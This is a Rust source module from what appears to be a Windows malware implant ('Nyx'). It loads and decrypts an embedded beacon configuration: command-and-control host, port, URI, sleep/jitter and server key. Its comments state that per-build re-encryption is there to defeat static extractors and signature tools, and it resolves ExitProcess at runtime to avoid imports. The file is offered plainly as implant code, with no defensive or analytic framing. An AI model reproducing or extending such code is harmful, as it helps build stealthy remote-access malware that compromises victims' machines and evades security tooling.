//! Per-build implant configuration.
//!
//! The config is baked at build time by `build.rs`: it reads `config.toml` (or
//! `NYX_CONFIG`), serializes it into a compact binary blob, encrypts it under
//! a fresh per-build ChaCha20-Poly1305 key+nonce, and emits `OUT_DIR/
//! config_blob.rs` with `CONFIG_KEY` / `CONFIG_NONCE` / `CONFIG_CT`. This
//! module re-includes those statics and decrypts + decodes them at runtime.
//!
//! Every build re-randomizes the key/nonce, so the static config bytes in the
//! final binary (and the surrounding layout) differ every build even when the
//! config values are identical — defeating static extractors/signature tools.
//!
//! Layout (must match `build.rs::bake_config`):
//! `str(host) | u16(port) | str(uri) | u32(sleep) | u8(jitter) | u8(tls)`

#![cfg(target_os = "windows")]

use crate::heap::{String, Vec};
use nyx_protocol::wire::{Reader, WireError}; // WireError kept for decode()'s Result

/// Build config baked into the implant at build time. The `server_pub` is baked
/// separately by `build.rs` (into `server_pub::SERVER_PUB`); it lives here so
/// the beacon loop has one place to read the full transport+session config.
pub struct Config {
    pub server_host: String,
    pub server_port: u16,
    pub beacon_uri: String,
    pub server_pub: [u8; 32],
    pub sleep_seconds: u32,
    pub jitter_pct: u8,
    pub use_tls: bool,
}

mod baked {
    // Generated by build.rs into OUT_DIR/config_blob.rs.
    include!(concat!(env!("OUT_DIR"), "/config_blob.rs"));
}

/// Decrypt + decode the embedded config blob into a [`Config`]. Called once at
/// entry (`beacon_loop` bootstrap). A failure here is fatal: either the
/// embedded config was tampered with (Poly1305 tag mismatch) or the build is
/// broken (blob shape wrong). Panics on either — the implant cannot beacon
/// without a config.
pub fn load() -> Config {
    let plain: Vec<u8> = nyx_config::decrypt(&baked::CONFIG_KEY, &baked::CONFIG_NONCE, baked::CONFIG_CT);
    match decode(&plain) {
        Ok(c) => c,
        Err(_) => {
            // Tampered or malformed baked config — the implant cannot proceed.
            // Resolve ExitProcess directly (same pattern as the panic handler
            // in lib.rs) and exit, rather than panic!ing: under no_std the
            // core panic machinery defaults to unwinding and the build does not
            // rebuild core with -Zbuild-std panic=abort, so a panic! here would
            // fail to link. A clean exit achieves the same "abort" semantics.
            unsafe {
                if let Some(addr) =
                    crate::resolve::export_addr(b"kernel32.dll", b"ExitProcess")
                {
                    let f: extern "system" fn(u32) -> ! = core::mem::transmute(addr);
                    f(0xC000_0001);
                }
            }
            // Defensive trap if ExitProcess could not be resolved (ntdll gone).
            loop {
                core::hint::spin_loop();
            }
        }
    }
}

/// Decode a plaintext config blob into a [`Config`]. Public so a selftest can
/// feed it a synthetic blob without going through the (host-side) encryption.
pub fn decode(blob: &[u8]) -> Result<Config, WireError> {
    let mut r = Reader::new(blob);
    let server_host = r.str()?;
    let server_port = r.u16()?;
    let beacon_uri = r.str()?;
    let sleep_seconds = r.u32()?;
    let jitter_pct = r.u8()?;
    let use_tls_byte = r.u8()?;
    Ok(Config {
        server_host,
        server_port,
        beacon_uri,
        server_pub: crate::server_pub::SERVER_PUB,
        sleep_seconds,
        jitter_pct,
        use_tls: use_tls_byte != 0,
    })
}
